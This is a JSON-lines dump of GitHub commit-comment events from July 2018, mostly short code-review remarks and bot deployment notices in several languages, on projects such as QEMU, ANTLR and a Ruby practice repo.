{"id":"7906858272","type":"CommitCommentEvent","actor":{"login":"korobochka"},"repo":{"name":"korobochka/cucumberjs-allure2-reporter"},"payload":{"comment":{"id":29567082,"position":null,"line":null,"path":null,"commit_id":"16d61e33947c4069bc6362b80fea320d73143a01","created_at":"2018-07-02T13:59:09Z","updated_at":"2018-07-02T13:59:09Z","author_association":"OWNER","body":"@yuriiveremiienko Sorry, did not really mean to break the API.\r\nFixed the issue in commons, now the old way works as before."}},"created_at":"2018-07-02T13:59:09Z"}
{"id":"7906859085","type":"CommitCommentEvent","actor":{"login":"strumet"},"repo":{"name":"strumet/strumet.github.io"},"payload":{"comment":{"id":29567083,"position":null,"line":null,"path":null,"commit_id":"9da149186b0322319a3e7655b90b8b40caeabe3d","created_at":"2018-07-02T13:59:17Z","updated_at":"2018-07-02T13:59:17Z","author_association":"OWNER","body":"Ciao Davide,\r\nl'esercizio cad EX10, come tutti i precedenti, deve produrre un disegno vettoriale, non un'immagine raster."}},"created_at":"2018-07-02T13:59:17Z"}
{"id":"7906859536","type":"CommitCommentEvent","actor":{"login":"jessicafalk"},"repo":{"name":"spatialos/UnityGDK"},"payload":{"comment":{"id":29567084,"position":5,"line":6,"path":"workers/unity/ProjectSettings/UnityConnectSettings.asset","commit_id":"ad3864ac04f2d54ad8092665b6e554ef57ab6edd","created_at":"2018-07-02T13:59:21Z","updated_at":"2018-07-02T13:59:21Z","author_association":"CONTRIBUTOR","body":"thought I had reverted that change..."}},"created_at":"2018-07-02T13:59:21Z"}
{"id":"7906863218","type":"CommitCommentEvent","actor":{"login":"Grimler91"},"repo":{"name":"termux/termux-root-packages"},"payload":{"comment":{"id":29567092,"position":null,"line":null,"path":null,"commit_id":"ac6aaaf8c5622d247c00ef6d0f536ac1e054b238","created_at":"2018-07-02T13:59:59Z","updated_at":"2018-07-02T13:59:59Z","author_association":"COLLABORATOR","body":"Seems that using gnupg needs the syntax you wrote while gnupg2 uses the old syntax.\r\nI think sticking to gnupg2 is the best solution, and then gnupg-curl can be removed from needed packages.\r\n\r\nThanks for reporting!"}},"created_at":"2018-07-02T13:59:59Z"}
{"id":"7906867262","type":"CommitCommentEvent","actor":{"login":"tomoharutsutsumi"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29567106,"position":11,"line":35,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T14:00:35Z","updated_at":"2018-07-02T14:00:35Z","author_association":"OWNER","body":"@ms2sato 承知しました。\r\n"}},"created_at":"2018-07-02T14:00:35Z"}
{"id":"7906867921","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29567109,"position":4,"line":770,"path":"tests/Makefile.include","commit_id":"84315f1a16962a2305879f4cae2bdd73ea2934e0","created_at":"2018-07-02T14:00:41Z","updated_at":"2018-07-02T14:00:41Z","author_association":"NONE","body":"No need for this; you can place it in tests/sdhci-test.c and remove the existing test."}},"created_at":"2018-07-02T14:00:41Z"}
{"id":"7906869754","type":"CommitCommentEvent","actor":{"login":"SuperHeron"},"repo":{"name":"linuxmint/flags"},"payload":{"comment":{"id":29567114,"position":null,"line":null,"path":null,"commit_id":"a9b10937eac1de26c4d7b3c8101198e5e3e7f222","created_at":"2018-07-02T14:00:59Z","updated_at":"2018-07-02T14:00:59Z","author_association":"NONE","body":"Could you please create a tag for it?"}},"created_at":"2018-07-02T14:00:59Z"}
{"id":"7906870475","type":"CommitCommentEvent","actor":{"login":"teverett"},"repo":{"name":"antlr/grammars-v4"},"payload":{"comment":{"id":29567117,"position":null,"line":null,"path":null,"commit_id":"44aa3b6bebeec9b29397eb7cf5866597ddc19e7e","created_at":"2018-07-02T14:01:07Z","updated_at":"2018-07-02T14:01:07Z","author_association":"MEMBER","body":"I believe that the InputStream class has been submitted as a PR to Antlr.\nIt will be a good addition to Antlr.\n\n\nOn Mon, Jul 2, 2018 at 5:08 AM, Alexander Levsha <notifications@github.com>\nwrote:\n\n> Sorry to dig this up, but why does this rely on the InputStream class that\n> isn't the part of ANTLR runtime? How am i supposed to use it in my\n> application, where the only thing i have available is ANTLR runtime and\n> adding other libs is non-trivial?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/antlr/grammars-v4/commit/44aa3b6bebeec9b29397eb7cf5866597ddc19e7e#commitcomment-29564722>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABK1Zu8pM4vc2ve8IV-rmHcCNu9pXRZ3ks5uCf8hgaJpZM4ObFD6>\n> .\n>\n"}},"created_at":"2018-07-02T14:01:07Z"}
{"id":"7906870689","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"seongyoon-me/TIL"},"payload":{"comment":{"id":29567118,"position":11,"line":11,"path":"0702.md","commit_id":"cf02656c5e297c5af5644bcf690f13efac404d2d","created_at":"2018-07-02T14:01:09Z","updated_at":"2018-07-02T14:01:09Z","author_association":"NONE","body":"콜레라 지도는 유명한 사례이긴 하지만 최초의 사례는 아니었답니다. 이를테면 [Edmond Halley의 일식(solar eclipse) 예측도](https://en.wikipedia.org/wiki/Solar_eclipse_of_May_3,_1715#/media/File:Solar_eclipse_1715May03_Halley_map.png)는 1700년대 초반에 그려졌다고 해요 😄 "}},"created_at":"2018-07-02T14:01:09Z"}
{"id":"7906874900","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29567129,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T14:01:52Z","updated_at":"2018-07-02T14:01:52Z","author_association":"OWNER","body":"@ericniebler That sounds ideal, I'll take a look, thanks"}},"created_at":"2018-07-02T14:01:52Z"}
{"id":"7906878645","type":"CommitCommentEvent","actor":{"login":"ericniebler"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29567134,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T14:02:30Z","updated_at":"2018-07-02T14:02:30Z","author_association":"NONE","body":"(It also uses real concepts when they are available. It's the emulation layer I've wanted for range-v3 for a long time.)"}},"created_at":"2018-07-02T14:02:30Z"}
{"id":"7906879276","type":"CommitCommentEvent","actor":{"login":"jim-collins"},"repo":{"name":"UKHomeOffice/booktravel_schema"},"payload":{"comment":{"id":29567137,"position":286,"line":289,"path":"travel-provider/TSP-40-SubmitTicketDetails/TSP-40-SubmitTicketDetails-Request.schema.json","commit_id":"17a13af69a8b293b88107ec1f2edf9227e259af2","created_at":"2018-07-02T14:02:37Z","updated_at":"2018-07-02T14:02:37Z","author_association":"NONE","body":"is description required"}},"created_at":"2018-07-02T14:02:37Z"}
{"id":"7906881079","type":"CommitCommentEvent","actor":{"login":"sopwerdna"},"repo":{"name":"sopwerdna/ceph"},"payload":{"comment":{"id":29567141,"position":null,"line":null,"path":null,"commit_id":"241521a358dece7077cbbbea93b50ef1cd462553","created_at":"2018-07-02T14:02:56Z","updated_at":"2018-07-02T14:02:56Z","author_association":"OWNER","body":"With the minor fixes made in c1cafc563c1fffd664d5ad64c36639b1cc829e4a, this compiles without errors."}},"created_at":"2018-07-02T14:02:56Z"}
{"id":"7906881336","type":"CommitCommentEvent","actor":{"login":"simon-frank"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29567142,"position":null,"line":null,"path":null,"commit_id":"508f0bf82f5d0b0dc316d51019d3a5d1e8abaecb","created_at":"2018-07-02T14:02:58Z","updated_at":"2018-07-02T14:02:58Z","author_association":"COLLABORATOR","body":"Ich bitte um die Einhaltung der Feedbackkultur"}},"created_at":"2018-07-02T14:02:58Z"}
{"id":"7906882704","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29567148,"position":null,"line":null,"path":null,"commit_id":"1576300374182a2e7f9f4894fcceb89fc40e87cc","created_at":"2018-07-02T14:03:13Z","updated_at":"2018-07-02T14:03:13Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-16](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-16).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-16-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-02T14:03:13Z"}
{"id":"7906882937","type":"CommitCommentEvent","actor":{"login":"andrewhthomas"},"repo":{"name":"andrewhthomas/urbanistjawn"},"payload":{"comment":{"id":29567149,"position":null,"line":null,"path":null,"commit_id":"5671395a50d7a3c9c7b789062e6824994f21b144","created_at":"2018-07-02T14:03:15Z","updated_at":"2018-07-02T14:03:15Z","author_association":"OWNER","body":"Created multidev environment [urbanistjawn#ci-25](https://dashboard.pantheon.io/sites/80761f73-3e8c-416e-a090-36df01dcb182#ci-25).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-25-urbanistjawn.pantheonsite.io/)"}},"created_at":"2018-07-02T14:03:15Z"}
{"id":"7906882944","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29567150,"position":19,"line":19,"path":"seoyeongsong/day3_review.md","commit_id":"fbf6019aeb84164708b017debaad8d7e59e0b07f","created_at":"2018-07-02T14:03:15Z","updated_at":"2018-07-02T14:03:15Z","author_association":"CONTRIBUTOR","body":"Ten-steps to complex learning은 실무에서 쓰이는 도구들을 소개하는 책은 아녜요 😄 교육 설계 방법에 대한 책이고요, 어떻게 하면 학습한 내용들이 실무에서 잘 활용될 수 있도록 교육을 설계할 것인지에 대한 내용을 담고 있습니다."}},"created_at":"2018-07-02T14:03:15Z"}
{"id":"7906883278","type":"CommitCommentEvent","actor":{"login":"Ecco"},"repo":{"name":"zardam/epsilon"},"payload":{"comment":{"id":29567153,"position":237,"line":385,"path":"escher/src/text_area.cpp","commit_id":"0b61aaa6a29775c1ef0e3c675c0705776f26965f","created_at":"2018-07-02T14:03:18Z","updated_at":"2018-07-02T14:03:18Z","author_association":"NONE","body":"I have a really hard time understanding this part of the code. It seems way too specific to be a bug, yet I have no clue what's the logic behind this `6` (and `text[0] == text[1]` as well to be honest)"}},"created_at":"2018-07-02T14:03:18Z"}
{"id":"7906885879","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29567158,"position":16,"line":24,"path":"tests/qgraph/libqgraph-main.c","commit_id":"84315f1a16962a2305879f4cae2bdd73ea2934e0","created_at":"2018-07-02T14:03:44Z","updated_at":"2018-07-02T14:03:44Z","author_association":"NONE","body":"Ok this is a bit sloppy. :)\r\n\r\nI think the right thing to do is place the command line options in a GPtrArray, and then g_strjoinv them into the full command line string.\r\n\r\nThen you can add a new function pointer to QOSGraphNode that takes the GPtrArray and adds the command line options. The sdhci-pci node will add `-device sdhci-pci,addr=04.0`."}},"created_at":"2018-07-02T14:03:44Z"}
{"id":"7906887016","type":"CommitCommentEvent","actor":{"login":"tomoharutsutsumi"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29567161,"position":71,"line":95,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T14:03:55Z","updated_at":"2018-07-02T14:03:55Z","author_association":"OWNER","body":"@ms2sato conncetor.delim.push(\",\")で文字列として入れていることを忘れていました。すみません。修正し、\r\n外しました。"}},"created_at":"2018-07-02T14:03:55Z"}
{"id":"7906887390","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29567163,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-02T14:03:59Z","updated_at":"2018-07-02T14:03:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T14:03:59Z"}
{"id":"7906890792","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29567172,"position":93,"line":127,"path":"tests/qgraph/libqgraph-main.c","commit_id":"84315f1a16962a2305879f4cae2bdd73ea2934e0","created_at":"2018-07-02T14:04:35Z","updated_at":"2018-07-02T14:04:35Z","author_association":"NONE","body":"Why are you swapping the first two elements? Possibly the answer is obvious but I am not seeing it."}},"created_at":"2018-07-02T14:04:35Z"}
{"id":"7906892976","type":"CommitCommentEvent","actor":{"login":"jim-collins"},"repo":{"name":"UKHomeOffice/booktravel_schema"},"payload":{"comment":{"id":29567177,"position":189,"line":202,"path":"travel-provider/TSP-40-SubmitTicketDetails/TSP-40-SubmitTicketDetails-Request.schema.json","commit_id":"17a13af69a8b293b88107ec1f2edf9227e259af2","created_at":"2018-07-02T14:04:57Z","updated_at":"2018-07-02T14:04:57Z","author_association":"NONE","body":"should this be a number"}},"created_at":"2018-07-02T14:04:57Z"}
{"id":"7906897070","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29567186,"position":109,"line":116,"path":"tests/qgraph/libqgraph-main.c","commit_id":"75df548a9e15f924f7a783bf2cbf2ee5837811ca","created_at":"2018-07-02T14:05:39Z","updated_at":"2018-07-02T14:05:39Z","author_association":"NONE","body":"Oh okay this works fine! The only question then is about the swapping of arguments."}},"created_at":"2018-07-02T14:05:39Z"}
{"id":"7906901710","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29567191,"position":5,"line":131,"path":"tests/qgraph/qsdhci.c","commit_id":"75df548a9e15f924f7a783bf2cbf2ee5837811ca","created_at":"2018-07-02T14:06:29Z","updated_at":"2018-07-02T14:06:29Z","author_association":"NONE","body":"Looks good then."}},"created_at":"2018-07-02T14:06:29Z"}
{"id":"7906902057","type":"CommitCommentEvent","actor":{"login":"Benard18"},"repo":{"name":"Benard18/Doctor-Patient-Application"},"payload":{"comment":{"id":29567194,"position":null,"line":null,"path":null,"commit_id":"734698ddb7d1ef6d9306a4df619944dbed3695fc","created_at":"2018-07-02T14:06:32Z","updated_at":"2018-07-02T14:06:32Z","author_association":"OWNER","body":"placing his merge requesr"}},"created_at":"2018-07-02T14:06:32Z"}
{"id":"7906904726","type":"CommitCommentEvent","actor":{"login":"tomoharutsutsumi"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29567202,"position":72,"line":96,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T14:07:00Z","updated_at":"2018-07-02T14:07:00Z","author_association":"OWNER","body":"@ms2sato elseはif elsif以外の場合という意味だと考えていたので、elsif index % 2 != 0のように具体的にこのような場合みたいな指定ができないと考えていました。 "}},"created_at":"2018-07-02T14:07:00Z"}
{"id":"7906906752","type":"CommitCommentEvent","actor":{"login":"tomoharutsutsumi"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29567205,"position":null,"line":null,"path":null,"commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T14:07:22Z","updated_at":"2018-07-02T14:07:22Z","author_association":"OWNER","body":"@ms2sato ご回答しました。"}},"created_at":"2018-07-02T14:07:22Z"}
{"id":"7906907042","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29567206,"position":11,"line":10,"path":"tests/qgraph/qsdhci.h","commit_id":"ace993d49d5c12502b01edf5d69521f27b969869","created_at":"2018-07-02T14:07:25Z","updated_at":"2018-07-02T14:07:25Z","author_association":"NONE","body":"Can you rename this to QSDHCIProperties (and the field name to `props`)? It gives the specifics of how the board implements its SDHCI controller."}},"created_at":"2018-07-02T14:07:25Z"}
{"id":"7906908372","type":"CommitCommentEvent","actor":{"login":"jaywinky"},"repo":{"name":"jaywinky/pre-commit-hooks"},"payload":{"comment":{"id":29567211,"position":null,"line":null,"path":null,"commit_id":"d59d3511d495fafda4c1385e913c18212de3a484","created_at":"2018-07-02T14:07:40Z","updated_at":"2018-07-02T14:07:40Z","author_association":"OWNER","body":"Oh thanks @asottile - looks exactly what I need! Somehow didn't manage to spot this."}},"created_at":"2018-07-02T14:07:40Z"}
{"id":"7906908449","type":"CommitCommentEvent","actor":{"login":"floooh"},"repo":{"name":"floooh/sokol"},"payload":{"comment":{"id":29567212,"position":null,"line":null,"path":null,"commit_id":"f89f9d5d43a181b3b7e8e9e84c57ced69b0bb9a9","created_at":"2018-07-02T14:07:40Z","updated_at":"2018-07-02T14:07:40Z","author_association":"OWNER","body":"Yeah, I also wasn't aware of the implications of using 0 for this (in one way it would make sense, since C's \"zero-initialized\" would mean \"invalid mouse button\". But after looking how the UI-samples would need to be changed I decided to use a magic constant for this."}},"created_at":"2018-07-02T14:07:40Z"}
{"id":"7906908878","type":"CommitCommentEvent","actor":{"login":"eroux"},"repo":{"name":"BuddhistDigitalResourceCenter/public-digital-library"},"payload":{"comment":{"id":29567214,"position":7,"line":37,"path":"public/config-defaults.json","commit_id":"178e5a7369e5e5e8f9b53df3dc2f0081133df0f7","created_at":"2018-07-02T14:07:45Z","updated_at":"2018-07-02T14:07:45Z","author_association":"NONE","body":"cool, thanks! A small detail: could the ID also contain the prefix please?"}},"created_at":"2018-07-02T14:07:45Z"}
{"id":"7906915528","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29567227,"position":null,"line":null,"path":null,"commit_id":"ace993d49d5c12502b01edf5d69521f27b969869","created_at":"2018-07-02T14:08:57Z","updated_at":"2018-07-02T14:08:57Z","author_association":"NONE","body":"For now just squash the last four commits. Then we will reorder the patches to get ready for submission, so that infrastructure comes first, drivers come second (in turn: first machines, then buses, then devices), and test conversion comes last."}},"created_at":"2018-07-02T14:08:57Z"}
{"id":"7906920619","type":"CommitCommentEvent","actor":{"login":"andrewhthomas"},"repo":{"name":"andrewhthomas/urbanistjawn"},"payload":{"comment":{"id":29567237,"position":null,"line":null,"path":null,"commit_id":"d4838ff182f8f1f0aa806d5b0e1d4a46b309d410","created_at":"2018-07-02T14:09:52Z","updated_at":"2018-07-02T14:09:52Z","author_association":"OWNER","body":"Created multidev environment [urbanistjawn#ci-26](https://dashboard.pantheon.io/sites/80761f73-3e8c-416e-a090-36df01dcb182#ci-26).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-26-urbanistjawn.pantheonsite.io/)"}},"created_at":"2018-07-02T14:09:52Z"}
{"id":"7906920975","type":"CommitCommentEvent","actor":{"login":"severin-lemaignan"},"repo":{"name":"CWallbridge/underworlds"},"payload":{"comment":{"id":29567240,"position":null,"line":null,"path":null,"commit_id":"df57008cacd3501696fdb3312bde288731269b4b","created_at":"2018-07-02T14:09:56Z","updated_at":"2018-07-02T14:09:56Z","author_association":"NONE","body":"I'm not quite sure this code does the right thing... have you tested it in a scene with children? First, the first parameter of `compute_transformed_bounding_box` should be a `ctx`.\r\nSecond, and more importantly, you should apply the whole chain of transformations to children, ie `transformation X parent0_child1_transformation X child1_child2_transformation X...` before looking for the bounding vertices."}},"created_at":"2018-07-02T14:09:56Z"}
{"id":"7906924686","type":"CommitCommentEvent","actor":{"login":"kavya1990"},"repo":{"name":"muvatech/Shopping-Cart-Using-Django-2.0-and-Python-3.6"},"payload":{"comment":{"id":29567244,"position":null,"line":null,"path":null,"commit_id":"c280b66df336285531d23f2eb4b0d0a881bed442","created_at":"2018-07-02T14:10:35Z","updated_at":"2018-07-02T14:10:35Z","author_association":"NONE","body":"Hi henry, thank u for ur reply and hints,,,i will try with that... and come back to you,,,,"}},"created_at":"2018-07-02T14:10:35Z"}
{"id":"7906936733","type":"CommitCommentEvent","actor":{"login":"FewTeamBot"},"repo":{"name":"DedSecCyber/target-web-zero"},"payload":{"comment":{"id":29567273,"position":null,"line":null,"path":null,"commit_id":"2b67a5621c5e338f8f456e6d10337e84349a752f","created_at":"2018-07-02T14:12:39Z","updated_at":"2018-07-02T14:12:39Z","author_association":"NONE","body":"สวยพี่สวย"}},"created_at":"2018-07-02T14:12:39Z"}
{"id":"7906938451","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29567278,"position":9,"line":9,"path":"compiler/testData/codegen/box/reflection/functions/enumValuesValueOf.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T14:12:58Z","updated_at":"2018-07-02T14:12:58Z","author_association":"MEMBER","body":"There's no vars, you're right"}},"created_at":"2018-07-02T14:12:58Z"}
{"id":"7906941660","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29567287,"position":50,"line":523,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"61092c2a5a587651e7d78d8e9759d9553b07c87d","created_at":"2018-07-02T14:13:31Z","updated_at":"2018-07-02T14:13:31Z","author_association":"CONTRIBUTOR","body":"if (j == ARRAY_SIZE(possible_base_addresses))\r\nreturn NULL;"}},"created_at":"2018-07-02T14:13:31Z"}
{"id":"7906943017","type":"CommitCommentEvent","actor":{"login":"gzmud"},"repo":{"name":"gzmud/rtndev"},"payload":{"comment":{"id":29567289,"position":6,"line":134,"path":"nginx-extras/Makefile","commit_id":"931545042ac737cd1015bfaa08f6ebf5ce4cb334","created_at":"2018-07-02T14:13:45Z","updated_at":"2018-07-02T14:13:45Z","author_association":"OWNER","body":"a bug without /usr"}},"created_at":"2018-07-02T14:13:45Z"}
{"id":"7906947956","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"Aagosh10/pincode_project"},"payload":{"comment":{"id":29567296,"position":34,"line":34,"path":"app/Http/Controllers/PincodeController.php","commit_id":"59bbd7a3b189c18f6182c5955a592d0a5304acb4","created_at":"2018-07-02T14:14:37Z","updated_at":"2018-07-02T14:14:37Z","author_association":"NONE","body":"`if ((condition1) and (condition2))`"}},"created_at":"2018-07-02T14:14:37Z"}
{"id":"7906948517","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"fourkbomb/linux"},"payload":{"comment":{"id":29567298,"position":5,"line":85,"path":"drivers/gpu/drm/panel/Kconfig","commit_id":"bcec1989f8eb84b3dcecc6d48333a0e7083e4c1b","created_at":"2018-07-02T14:14:43Z","updated_at":"2018-07-02T14:14:43Z","author_association":"NONE","body":"nit: `Magnachip`."}},"created_at":"2018-07-02T14:14:43Z"}
{"id":"7906948861","type":"CommitCommentEvent","actor":{"login":"gozomozo"},"repo":{"name":"gozomozo/test"},"payload":{"comment":{"id":29567299,"position":null,"line":null,"path":null,"commit_id":"a1a0b8816892e5900084b64a3a3fd97ee1d8e80c","created_at":"2018-07-02T14:14:46Z","updated_at":"2018-07-02T14:14:46Z","author_association":"OWNER","body":"\r\n1 | mkdir ~/Test\r\n-- | --\r\n\r\n\r\n"}},"created_at":"2018-07-02T14:14:46Z"}
{"id":"7906950412","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567305,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:15:03Z","updated_at":"2018-07-02T14:15:03Z","author_association":"CONTRIBUTOR","body":"I have no idea. I have too many question that previously I assumed the answer but seem to be wrong. What is the framebuffer? Is fb vs gpu the same? When gralloc allocate memory from the fb device, is that memory used to actually draw to the display? What is the usage of the memory allocated from ion device?\r\nDigging deeper. I think I know nothing about it."}},"created_at":"2018-07-02T14:15:03Z"}
{"id":"7906951399","type":"CommitCommentEvent","actor":{"login":"flx42"},"repo":{"name":"NVIDIA/nvidia-container-runtime"},"payload":{"comment":{"id":29567307,"position":null,"line":null,"path":null,"commit_id":"300aaf9bd4ab955d3cf1d5a8d69f7d1ca808e62c","created_at":"2018-07-02T14:15:15Z","updated_at":"2018-07-02T14:15:15Z","author_association":"MEMBER","body":"It's been released."}},"created_at":"2018-07-02T14:15:15Z"}
{"id":"7906952640","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29567311,"position":241,"line":150,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"be8850079e3f958cc6056781bf30f63173ab17fe","created_at":"2018-07-02T14:15:28Z","updated_at":"2018-07-02T14:15:28Z","author_association":"CONTRIBUTOR","body":"Von hier"}},"created_at":"2018-07-02T14:15:28Z"}
{"id":"7906955103","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567315,"position":1,"line":75,"path":"corelibrary/src/main/java/com/axway/ats/core/filetransfer/SftpClient.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:15:53Z","updated_at":"2018-07-02T14:15:53Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:15:53Z"}
{"id":"7906956277","type":"CommitCommentEvent","actor":{"login":"gozomozo"},"repo":{"name":"gozomozo/test"},"payload":{"comment":{"id":29567317,"position":null,"line":null,"path":null,"commit_id":"a1a0b8816892e5900084b64a3a3fd97ee1d8e80c","created_at":"2018-07-02T14:16:06Z","updated_at":"2018-07-02T14:16:06Z","author_association":"OWNER","body":"\r\n1 | cd ~/Test\r\n-- | --\r\n\r\n\r\n"}},"created_at":"2018-07-02T14:16:06Z"}
{"id":"7906956805","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29567318,"position":396,"line":251,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"be8850079e3f958cc6056781bf30f63173ab17fe","created_at":"2018-07-02T14:16:11Z","updated_at":"2018-07-02T14:16:11Z","author_association":"CONTRIBUTOR","body":"Bis hier, sollte alles in eine Funktion umgewandelt werden, damit kein Speicher und mem_fd nicht mehr geleakt wird."}},"created_at":"2018-07-02T14:16:11Z"}
{"id":"7906957280","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29567321,"position":null,"line":null,"path":null,"commit_id":"62bd4d7d9afd9459528cc2d44b35b206993bbcce","created_at":"2018-07-02T14:16:16Z","updated_at":"2018-07-02T14:16:16Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-12](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-12-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-02T14:16:16Z"}
{"id":"7906959139","type":"CommitCommentEvent","actor":{"login":"tomoharutsutsumi"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29567323,"position":23,"line":190,"path":"ruby_fourth.rb","commit_id":"87f507d734ecd8cc590a053c9943e61f683b4da1","created_at":"2018-07-02T14:16:36Z","updated_at":"2018-07-02T14:16:36Z","author_association":"OWNER","body":"@ms2sato すみません。確認なのですが、211行目のindex += 1を削除して対応できるかということでよろしいでしょうか。"}},"created_at":"2018-07-02T14:16:36Z"}
{"id":"7906959263","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567324,"position":1,"line":17,"path":"corelibrary/src/main/java/com/axway/ats/core/ssh/JschSftpClient.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:16:37Z","updated_at":"2018-07-02T14:16:37Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:16:37Z"}
{"id":"7906961132","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567326,"position":1,"line":16,"path":"corelibrary/src/main/java/com/axway/ats/core/ssh/JschSshClient.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:16:56Z","updated_at":"2018-07-02T14:16:56Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:16:56Z"}
